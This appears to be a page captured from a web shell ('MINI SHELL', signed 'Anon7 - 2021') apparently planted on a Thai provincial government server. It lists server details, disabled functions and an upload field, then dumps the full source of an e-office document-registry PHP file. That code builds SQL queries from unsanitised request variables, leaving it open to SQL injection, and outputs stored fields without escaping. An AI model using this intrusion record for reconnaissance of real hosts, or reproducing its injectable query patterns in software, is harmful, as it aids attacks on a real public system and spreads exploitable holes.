MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory : /var/www/html/eoffice/application/document/
Upload File :
Current File : /var/www/html/eoffice/application/document/docreg_getview.php
<?
session_start();
$sql="
SELECT
*
FROM
document
WHERE
document.id =  '$id'
";
$result = mysql_query($sql)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$ers = mysql_fetch_assoc($result);



$sql_p="
SELECT
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname,
doc_receive.staff_id,
doc_receive.docid
FROM
doc_receive
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
";
$result_p = mysql_query($sql_p)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$ersp = mysql_fetch_assoc($result_p);
$pr[$ersp[docid]]=$ersp[prename]." ".$ersp[staffname]." ".$ersp[staffsurname];



$sql_g="
SELECT
doc_receive.docid,
$table_staffgroup.groupname,
doc_receive.group_id
FROM
doc_receive
Inner Join $table_staffgroup ON doc_receive.group_id = $table_staffgroup.gid
WHERE
doc_receive.docid =  '$ers[id]'
";
$result_g = mysql_query($sql_g)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
$ersg= mysql_fetch_assoc($result_g);
$gr[$ersg[docid]]=$ersg[groupname];


$sql_permit="
SELECT
doc_receive.docid,
doc_receive.status,
doc_receive.comment,
doc_receive.deadline,
doc_receive.deadline_alert
FROM
doc_receive
where
doc_receive.staff_id=$session_staffid
group by doc_receive.docid
";

$result_permit = mysql_query($sql_permit)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($rs_permit = mysql_fetch_assoc($result_permit)){
$pr[$session_staffid]=$rs_permit[docid];
$read_status[$rs_permit[docid]]=$rs_permit[status];
$p_comment[$rs_permit[docid]]=$rs_permit[comment];

if($rs_permit[deadline]){
$owner_deadline[$rs_permit[docid]]=$rs_permit[deadline];
$owner_alert[$rs_permit[docid]]=$rs_permit[deadline_alert];
$d=explode("-",$rs_permit[deadline]);
$mkremain=(  (mktime(12, 0, 0, $d[1], $d[2], $d[0]))-( mktime(12, 0, 0, date("m"), date("d"), date("Y"))) )/(24*60*60);
$owner_remain[$rs_permit[docid]]=$mkremain;
}

}


$sql_attach_check = "
SELECT
doc_attach.id,
doc_attach.name,
doc_attach.attach,
doc_attach.description
FROM
doc_attach
Inner Join document ON doc_attach.docid = document.id
WHERE
document.id = '$ers[id]'
";
$result_check = mysql_query($sql_attach_check)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($crs = mysql_fetch_assoc($result_check)){
$attachname[$crs[id]]=$crs[name];
$attachfile[$crs[id]]=$crs[attach];
$descritment[$crs[id]]=$crs[description];
}

$sql_attach_permit = "
SELECT
doc_attach.id,
doc_attach.name,
doc_attach.attach,
doc_receive.staff_id,
doc_receive.group_id,
doc_receive.`deadline`,
doc_receive.`deadline_alert`
FROM
doc_attach
Inner Join document ON doc_attach.docid = document.id
Inner Join doc_receive ON doc_receive.docid = document.id
where
doc_attach.docid=$ers[id]
and doc_receive.staff_id=$session_staffid
";
$result_permit = mysql_query($sql_attach_permit)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($permit_rs = mysql_fetch_assoc($result_permit)){
$permit[$permit_rs[id]]=$permit_rs[staff_id];

// $p_comment[$permit_rs[id]]=$permit_rs[comment];
// print_r($permit_rs);
}
/*
if ($_SERVER[REQUEST_METHOD] == "POST"){ 


}
*/
if($ers[group_id]){$getting=$gr[$ersg[docid]];}
if($ers[staff_id]){$getting=$pr[$ersp[docid]];}
?>
<style type="text/css">
<!--
.style2 {color: #FF0000;}
-->
</style>

<TABLE width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#eeeeee">
<TR><TD  align="center" valign="top"><table width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC" <? if($ers[doc_status]){echo "bgcolor=#CCCCCC";}?>>
	<tr>
		<td><table width="360" border="0" cellspacing="0" cellpadding="0" class="normal">
			<tr bgcolor="#f8f8f8">
				<td height="20" colspan="2" class="normal_blue">&nbsp;<img src="../../images/document_view.gif" width="24" height="24" border="0" align="absmiddle" /><b class="brown">
					<?=$ers[title]?>
					<br />
					ทะเบียนหนังสือ<? if($type=="get"){echo "รับ";}else if($type=="send"){echo "ส่ง"; }else if($type=="circular"){echo "เวียน"; }?>
					
				</b></td>
				</tr>
			<tr>
				<td colspan="2"><hr color="#eeeeee" /></td>
			</tr>
			<tr>
				<td width="157" align="right" valign="top" class="normal_black">ลำดับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?=$ers[docid]?></td>
			</tr>
			<? if($type=="get"){?>
			<tr>
				<td align="right" valign="top" class="normal_black">วันรับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
					<? if($ers[tdate]){?>
					<?=daythai($ers[tdate])?>
					<? }?>
					</td>
			</tr>
			<? }?>
			
			<tr>
				<td width="157" align="right" valign="top" class="normal_black">เลขหนังสือ&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?=$ers[refid]?>
						<?
						$sql_setting="
						select * from system 
						";
						$result=mysql_query($sql_setting);
						while($command=mysql_fetch_assoc($result)){
						if($command[command]=="autonumber"){$auto_check=$command[value];}
						if($command[runningout]=="runningout"){$max_out=$command[value];}
						if($command[runningout]=="runningcircular"){$max_out=$command[value];}		
						}	
						
						 if($auto_check=="on"){
						  ?>
						<? // if($ers[type]=="send"){echo "/$ers[number]";}?><? // if($ers[type]=="circular"){echo "/ว$ers[number]";}?>
						<? }?>
						ลงวันที่. 
						<?=daythai($ers[pdate])?></td>
			</tr>
			<tr>
				<td align="right" valign="top" class="normal_black">จาก&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?=$ers[sending]?></td>
			</tr>
			<tr>
				<td align="right" valign="top" class="normal_black">ถึง&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top">&nbsp;
						<?=$ers[getting]?></td>
			</tr>
			<!--<TR valign="top">
	<td align="right" valign="top" class="normal_black">การปฏิบัติ&nbsp;<b>:</b>&nbsp;</td>
	<TD valign="top">&nbsp;<?=$ers[sector]?></TD>
</TR>-->
			<? if($owner_deadline[$id]){?>
			<tr valign="top">
				<td align="right" valign="top" class="normal_black"><span class="normal_blue">วันดำเนินการ&nbsp;<b>:</b>&nbsp; </span></td>
				<td valign="top">&nbsp;
					<?=daythai($owner_deadline[$id])?><? if( ($owner_remain[$id]<=$owner_alert[$id]) && ($owner_remain[$id]>"0") ){ ?> 
					<span class="style2"><b>เหลือเวลา 	<?=$owner_remain[$id]?> วัน 
					 </b></span>
					 <?}elseif($owner_remain[$id]=="0"){?><span class="style2"><b> วันสุดท้าย </b></span><?}?>				</td>
			</tr>
			<? }?>
			
			<tr valign="top">
				<td align="right" valign="top" class="normal_black">ชั้นความเร็ว<span class="normal_blue">&nbsp;<b>:</b>&nbsp;</span></td>
				<td align="left" valign="top">&nbsp; 
<? if($ers[speed]=="100") { ?>ด่วน<? } ?>
<? if($ers[speed]=="200") { ?>ด่วนมาก<? } ?>
<? if($ers[speed]=="300") { ?>ด่วนที่สุด<? } ?>				</td>
			</tr>
			
			<? if(!$sercet_select || $sercet_select=="on"){?>
			<tr valign="top">
				<td align="right" valign="top" class="normal_black">ชั้นความลับ<span class="normal_blue">&nbsp;<b>:</b>&nbsp;</span></td>
				<td align="left" valign="top">&nbsp; 		
<? if($ers[secret]=="100") { ?>ลับ<? } ?>
<? if($ers[secret]=="200") { ?>ลับมาก<? } ?>
<? if($ers[secret]=="300") { ?>ลับที่สุด<? } ?>				</td>
			</tr>
			<? }?>
			
			
			<? if($type=="get"){?>
			<tr valign="top">
				<td align="right" class="normal_black">วันรับเอกสาร&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
				<? if(!$ers[tdate]){ $ti1=explode(" ","$ers[time_rec]");$ers[tdate]=$ti1[0];}?>
					<?=daythai($ers[tdate])?></td>
			</tr>
			<tr valign="top">
				<td align="right" class="normal_black">การปฏิบัติ&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
					<?=$ers[mission]?></td>
			</tr>
			<? }?>
			
			
			
			<tr valign="top">
				<td width="157" align="right" valign="top" class="normal_black">หมายเหตุ&nbsp;<b>:</b>&nbsp;</td>
				<td valign="top">&nbsp;
						<?=$ers[comment]?>
						<br />
						<br />
					&nbsp;
					<?=$p_comment[$ers[id]]?></td>
			</tr>
			<tr valign="top">
				<td align="right" valign="top" class="normal_black">&nbsp;ไฟล์เอกสารแนบ&nbsp;<b>:</b>&nbsp;</td>
				<td width="443" valign="top"><ul>
						<? 
if (is_array($attachname) )  {

	foreach($attachname as $attach_id => $attach_name) { ?>
						<li><img src="../../images/attach16.gif" width="16" height="16" border="0" align="absmiddle"/>
								<? if( ($session_permit[200]) ||  ( $session_staffid==$ers[owner] ) || ($permit[$attach_id]==$session_staffid)  ){?>
								<a href="download_file.php?reading=<?=$attach_id?>" target="_blank" title="<?=$attach_name?>">
								<?=trimtxt($descritment[$attach_id],32)?>
								</a>
								<? }else{ ?>
								<?=trimtxt($descritment[$attach_id],32)?>
							<? } ?>
								<? }
} ## if (is_array($file_attach) )  {
	?>
						</li>
				</ul>					 				</td>
			</tr>
			<? if( ($session_permit[300]) ){	?>
			<tr>
			<td align="center" valign="top">				</td>
				<td align="left" valign="top">
				<!--
				<table width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
					<tr>
						<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
							<tr>
								<td>จ่ายหนังสือ</td>
								<td><?=$all?></td>
								<td colspan="2">ครั้ง </td>
							</tr>
							<tr>
								<td>รับทราบ</td>
								<td><?=$aaa?></td>
								<td>คน </td>
								<td>คิดเป็นร้อยละ
									<?=$ppp?></td>
							</tr>
							<tr>
								<td>รับหนังสือแล้ว</td>
								<td><?=$aaa?></td>
								<td>คน </td>
								<td>คิดเป็นร้อยละ
									<?=$ppp?></td>
							</tr>
							<tr>
								<td>คงเหลือ</td>
								<td><?=$aaa?></td>
								<td>คน </td>
								<td>คิดเป็นร้อยละ
									<?=$ppp?></td>
							</tr>
						</table></td>
					</tr>
				</table>
				-->
					<br />
					 <div align="right">
<!--<a href="<?=$PHP_SELF?>?action=activity&id=<?=$ers[id]?>&page=<?=$page?>&type=<?=$type?>" >
					 ส่งต่อหนังสือ</a>	&nbsp;				 
					 <br>-->
					<label onclick="MM_openBrWindow('take_doc.php?type=<?=$type?>&id=<?=$ers[id]?>','add_user','addres=no,toolbar=no,scrollbars=yes,width=400,height=600')">
					<u style="cursor:hand">ลงทะเบียนรับหนังสือต้นฉบับ </u></label>&nbsp;					</div>					</td>
			</tr>
			<? } ?>			
			<tr>
				<td colspan="2" align="center"><hr color="#eeeeee" />
							
						<input name="button" type="button" class="input" style="width:100;" onclick="window.location.replace('<?=$PHP_SELF?>?page=<?=$page?>&amp;type=<?=$type?>')" value="กลับหน้าหลัก" />						</td>
			</tr>
		</table></td>
	</tr>
</table></TD>
<TD width="80%" align="center" valign="top">
	<? 
	$user_id=$ers[id]; 
	$timecoming=$ers[time_rec];
	$ownercoming=$ers[owner];
	?>
	<? include "docreg_history.php";?></TD>
</TR>
</TABLE>


<?

#		 if($_SESSION[session_title]){echo "(".$_SESSION[session_title].")";} 	
#			 $_SESSION[session_fullname] 
 
################################# Start กำหนด ชื่อ ตำแหน่ง และ Action 
if ($session_fullname_title == "" ){ $session_fullname_title = $_SESSION[session_title] . $_SESSION[session_fullname] ; }
#if ( $action == "view"){ $action_label = "เรียกดูเอกสาร";  $action_id = 400 ; }else{ $action_label = $action ; } 
$action_id = "view" ; 
$sql4 = " SELECT title FROM epm_staff WHERE staffid = '$session_staffid'   "; 
$result4 = mysql_query($sql4) ; 
while ($rs4 = mysql_fetch_assoc($result4) ){
	$position_now = $rs4[title] ; 
}
#$session_fullname_titleposition = $session_fullname_title ."<br>(ตำแหน่ง ". $position_now .")"  ; 
#session_fullname_title  <=============== มี position อยู่แล้ว
################################# END  กำหนด ชื่อ ตำแหน่ง และ Action 



$sql4="SELECT * FROM doc_history WHERE docid='$ers[id]' AND doc_owner='$session_staffid' AND doc_action='$action_id' "; 
$result4 = mysql_db_query($dbname , $sql4) ; 
echo mysql_error() ;

#echo "<br><br> บรรทัดที่". __LINE__ ." <hr>  $sql4 <hr> "  ;
if (mysql_num_rows($result4) ==0 ){ ############### END ยังไม่เคยเปิดอ่าน
	$doc_history="เปิดเอกสาร $ers[id]";
	doclog($ers[id],$pr[$doc_id],'',$session_fullname_title ,$session_staffid,$session_fullname_title,'',$doc_history ,$action_id  ); 
} ############### END ยังไม่เคยเปิดอ่าน




$sql_update_status = "
UPDATE   doc_receive  SET  
doc_receive.status='100',
doc_receive.timeknow=now( ) 
WHERE (doc_receive.docid='$ers[id]')
AND doc_receive.staff_id='$session_staffid'
AND doc_receive.status='0'
";
$result_update_status = mysql_query($sql_update_status)or die("Query line " . __LINE__ . " error<hr>".mysql_error());

?>
Anon7 - 2021